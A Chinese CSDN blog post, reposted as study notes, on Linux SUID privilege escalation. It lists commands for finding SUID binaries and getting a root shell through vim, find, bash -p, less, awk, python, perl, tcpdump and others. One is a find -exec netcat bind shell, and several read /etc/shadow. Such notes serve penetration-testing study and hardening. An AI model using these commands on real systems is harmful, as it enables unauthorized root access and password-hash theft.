linux 普通用户提权root

最新推荐文章于 2024-05-31 17:15:23 发布
最新推荐文章于 2024-05-31 17:15:23 发布
阅读量1k 收藏 3
点赞数
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vippomelo/article/details/120531878
版权

Linux提权之SUID提权

本篇文章非原创,用作笔记方便后期查询,原创作者微信公众号“黑白之道”如有侵权,联系删除

什么是suid?

通俗的理解为其他用户执行这个程序的时候可以用该程序所有者/组的权限。

常见的可用于suid提权的命令

Vim

find

Bash

More

Less
 cp chmod ash/linux shell  

awk mv man  

  python

 perl

 

tcpdump
 

 

查找suid文件

 

 
1
 
2
 
3
 
4
 
5
 
6
 
7
 
8
 
9
 
10
 
11
 		 
find / -perm -u=s -type f 2>/dev/null
 
 
 
/表示从文件系统的顶部(根)开始并找到每个目录
 
-perm 表示搜索随后的权限
 
-u = s表示查找root用户拥有的文件
 
-type表示我们正在寻找的文件类型
 
f 表示常规文件,而不是目录或特殊文件
 
2表示该进程的第二个文件描述符,即stderr(标准错误)
 
>表示重定向
 
/ dev / null是一个特殊的文件系统对象,它将丢弃写入其中的所有内容。
 
 

 

 

Vim
Vim是Linux环境下的一款文件编辑器。但是,如果以SUID运行的话,它会继承root用户的权限,因此可以读取系统上的所有文件。

 

 
1
 
2
 
3
 
4
 		 
vim.tiny
 
# Press ESC key
 
:set shell=/bin/sh
 
:shell
 
 

 

 
 find
 

如果Find命令也是以Suid权限运行的话,则将通过find执行的所有命令都会以root权限执行。
 

 

 
1
 
2
 		 
touch pentestlab
 
find pentestlab -exec whoami \;
 
 

 

 大部分Linux操作系统都安装了netcat,因此也可以被利用来将权限提升至root。
 

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;
连接上去就会直接获取到一个Root权限的shell。
 

  1.  
    netcat 192.168.1.189 5555
     
  2.  
    id
     
  3.  
    cat /etc/shadow
     
 

Bash

 

 
1
 
2
 
3
 		 
bash -p
 
bash-3.2# id
 
uid=1002(service) gid=1002(service) euid=0(root) groups=1002(service)
 
 

 


  More
 

 

 
1
 
2
 		 
more /home/pelle/myfile
 
!/bin/bash
 
 

 

 

Less

 

 
1
 
2
 		 
less /etc/passwd
 
!/bin/sh
 
 

 


  cp(暂未验证)
 

 

 
1
 		 
sudo sh -c 'cp $(which cp) .; chmod +s ./cp'
 
 

 

 chmod(暂未验证)
 

 

 
1
 		 
sudo sh -c 'cp $(which chmod) .; chmod +s ./chmod'
 
 

 


  ash/linux shell
 

 

 
1
 		 
sudo ash
 
 

 

 
 awk
 

 
1
 		 
awk 'BEGIN {system("/bin/bash")}'
 
 

 
 

mv(暂时未有实例)
 

 

 
1
 		 
使用mv 覆盖 /etc/shadow 或者/etc/sudoers
 
 

 

  man
 

 

 
1
 
2
 		 
man passwd
 
!/bin/bash
 
 

 


  python
 

 

 
1
 
2
 		 
import os
 
os.system("/bin/bash")
 
 

 

 perl
 

 

 
1
 		 
exec "/bin/bash";
 
 

 

 ruby/lua/etc也有相似
 

 


 tcpdump
 

 
1
 
2
 
3
 		 
echo $'id\ncat /etc/shadow' > /tmp/.test
 
chmod +x /tmp/.test
 
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
 
 

 

后续再找到再补充

                

        

        

    




    

      

        

            

              
                
                  青柚创客
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    3
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
linux 普通用户提权root.docx

				
			

			

				

					06-04
				

			

		

		

			
				
Linux 普通用户提权root 的方法和技术  Linux 操作系统中,普通用户如何提权root 是一个非常重要的安全问题。在 Linux 系统中,普通用户只能执行有限的操作,而 root 用户则拥有最高的权限。因此,普通用户...

			
		

	



                

              
                



	

		

			

				
					
linux安全漏洞,普通用户提权root执行任意命令!

				
			

			

				

					whoim_i的博客
				

				

					03-17
					
					3505
					
				

			

		

		

			
				
目录前言漏洞详情漏洞利用修复建议

        ~~~~~~~~        因为想要面对一个新的开始,一个人必须有梦想、有希望、有对未来的憧憬。如果没有这些,就不叫新的开始,而叫逃亡。 ​​​​
   ...

			
		

	



                


  
              

                


	

		

			

				
					
linux suid提权

				
			

			

				

					qq_42307546的博客
				

				

					04-15
					
					632
					
				

			

		

		

			
				
SUID是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行
时,使调用者暂时获得该文件拥有者的权限。也就是如果ROOT用户给某个可执行文件加了S权限,那么
该执行程序运行的时候将拥有ROOT权限
以下命令可以发现系统上运行的所有SUID可执行文件
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm

			
		

	





	

		

			

				
					
Linux】手把手教你在Linux环境下为普通用户 sudo 提权

					
最新发布

				
			

			

				

					weixin_45031801的博客
				

				

					05-31
					
					1584
					
				

			

		

		

			
				
本次博客我将会手把手带大家快速解决 Linux 下用不了sudo命令的问题,相信看完的小伙伴都能解决该问题。那么废话不多说,开始我们今天的内容。

			
		

	



		

			
		



	

		

			

				
					
Linux普通用户提权root权限-虽然文章短,但是精悍

				
			

			

				

					的博客
				

				

					05-08
					
					516
					
				

			

		

		

			
				
验证有没有sudo权限。

			
		

	





	

		

			

				
					
基于Linux下的root提权骚操作

				
			

			

				

					帅醉了的博客
				

				

					01-30
					
					5617
					
				

			

		

		

			
				
0x00_前言
小小博客,大大梦想。
博主还是小白,总结几个有关于在入侵靶机后,如何在Linux下的关于普通用户提权root下的操作,如有错误或其他请多多包含,希望提出多交流。
0x01_操作简介
提权的三个骚操作:

内核溢出
明文密文解密
计划任何进程
密码复用
加粗样式


...

			
		

	





	

		

			

				
					
Linux被曝出SUDO提权漏洞,幸好影响不大

				
			

			

				

					NOSEC2019的博客
				

				

					10-15
					
					2409
					
				

			

		

		

			
				
近期,有安全人员发现了Linux sudo命令中的一个安全漏洞,可让普通用户root权限执行命令。但值得庆幸的是,这个漏洞只能在非标准配置的Linux下生效,大多数Linux服务器不受影响。
在我们开始讨论这个漏洞前,有一些关于sudo命令的工作原理以及相关设置是需要去了解的。
当在Linux操作系统上执行命令时,只有得到许可或者知道root密码,普通用户才可以使用sudo(super use...

			
		

	





	

		

			

				
					
Linux曝出Sudo提权漏洞 任意用户亦可运行root命令

				
			

			

				

					09-14
				

			

		

		

			
				
Linux系统中的Sudo工具是一个非常关键的组件,它允许普通用户在权限提升的情况下执行特定的命令,通常是模拟root用户。Sudo的存在使得系统管理变得更加灵活,但同时也带来了潜在的安全风险。最近,一个名为"Sudo提权...

			
		

	





	

		

			

				
					
sudo提权普通用户免密切换到root详细笔记

				
			

			

				

					07-02
				

			

		

		

			
				
本笔记将详细讲解如何通过`sudo`进行提权以及设置普通用户免密切换到root的方法。  首先,我们创建一个新的用户`shi`:  ```bash [root@www ~]# useradd shi ```  接着,我们为`shi`用户设置密码:  ```bash [root@...

			
		

	





	

		

			

				
					
Linux提权扫描脚本

				
			

			

				

					04-28
				

			

		

		

			
				
Linux系统中,"提权"是指通过某种方式获取比当前用户权限更高的权限,通常是普通用户root权限的提升。提权扫描脚本是用于检测系统中可能存在提权漏洞的工具,它可以帮助管理员识别和修复安全风险。这篇文档将...

			
		

	





	

		

			

				
					
linux内核自动提权脚本.zip

				
			

			

				

					02-01
				

			

		

		

			
				
2. **提权**:在计算机安全领域,提权是指攻击者通过利用系统中的漏洞,将普通用户的权限提升到管理员或root级别,从而获得对系统的完全控制。在Linux中,root用户拥有最高权限,可以执行任何操作。  3. **内核提权*...

			
		

	





	

		

			

				
					
用户权限---u+s\g+s\o+t三个特殊权限说明

				
			

			

				

					weixin_43277869的博客
				

				

					09-27
					
					7462
					
				

			

		

		

			
				
我们都知道在linux中一个文件有三个权限,分别时用户权限,群组权限以及其他权限,是用wrxwrxwrx表示的,w代表可写,r代表可读,x代表可执行。但在一些特殊情况中还会出现s,或者t。
这种情况主要分为三种:
rwsrwxrwx   用户权限出现了s,替代了x
rwxrwsrwx   群组权限出现了s,替代了x
rwxrwxrwt   其他权限出现了t,替代了x
分开一一说明
**用户权限出现...

			
		

	





	

		

			

				
					
Linux普通用户提权(sudo)

				
			

			

				

					Xpccccc的博客
				

				

					11-01
					
					1868
					
				

			

		

		

			
				
Linux普通用户提权(sudo)

			
		

	





	

		

			

				
					
Linux中的提权操作

				
			

			

				

					weixin_52757485的博客
				

				

					08-01
					
					2177
					
				

			

		

		

			
				
具体工作过程:当用户执行sudo时,系统会主动寻找/etc/sudoers文件,判断该用户是否有执行sudo的权限,确认用户具有执行权限后,让用户输入用户自己的密码确认,若密码输入成功,则开始执行sudo后续的命令。临时提权的方法是用sudo的工作原理:将当前用户切换到超级用户下,以超级用户身份执行命令,执行完成后,直接退回到当前用户。[root@localhost ~]# vim /etc/sudoers (进入/etc/sudoers)(成功在普通用户下临时提权

			
		

	





	

		

			

				
					
MySQL提权

					
热门推荐

				
			

			

				

					Grey的博客
				

				

					05-12
					
					3万+
					
				

			

		

		

			
				
一、Mysql提权必备条件1.服务器安装Mysql数据库利用Mysql提权的前提就是服务器安装了mysql数据库,且mysql的服务没有降权,Mysql数据库默认安装是以系统权限继承的,并且需要获取Mysql root账号密码。2.判断Mysql服务运行权限对于Mysql数据库服务运行权限有很多方法,我这里主要介绍三种,一种是通过查看系统账号,也即使用“net user”命令查看系统当前账号,如果...

			
		

	





	

		

			

				
					
Linux中如何给普通用户提权

				
			

			

				

					狂小伍的博客
				

				

					01-26
					
					2032
					
				

			

		

		

			
				
Linux中给普通用户提权

			
		

	





	

		

			

				
					
linux 提权总结

				
			

			

				

					weixin_51681694的博客
				

				

					06-13
					
					7338
					
				

			

		

		

			
				
会继续补充.....

			
		

	





	

		

			

				
					
Linux系统之普通用户sudo提权配置

				
			

			

				

					jks212454的博客
				

				

					04-07
					
					1739
					
				

			

		

		

			
				
Linux系统之普通用户sudo提权配置

			
		

	





	

		

			

				
					
Linux下,给普通用户提权的方法,su与sudo命令,sudo需要提前在sudoers文件中配置

				
			

			

				

					ganfanren00001的博客
				

				

					01-02
					
					7551
					
				

			

		

		

			
				
Linux下,给普通用户提权的方法,su与sudo命令
一、需要提权的场景:
1、普通用户没有足够的访问权限
2、root权限太强应该少用
3、普通用户不得不执行特殊指令时需要提权
su,永久提权,不退出就可以一直用的命令:
su //switching user交换用户
注意:
用户用$表示,root用#表示


普通用户使用命令
su root
使用root权限登陆,密文输入超管密码后,用户就会变成超管root登陆。

用完退出超管root

su username
也可以使用户切换到其他用户,不一定只

			
		

	





	

		

			

				
					
linux 怎么给用户提权

				
			

			

				

					07-28
				

			

		

		

			
				
1. 使用sudo命令:sudo命令可以让普通用户以超级用户(root)的身份执行特定的命令。只需在命令前加上sudo,然后输入当前用户的密码,即可执行需要提权的命令。例如,要安装软件包可以使用sudo apt install 。  2. ...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值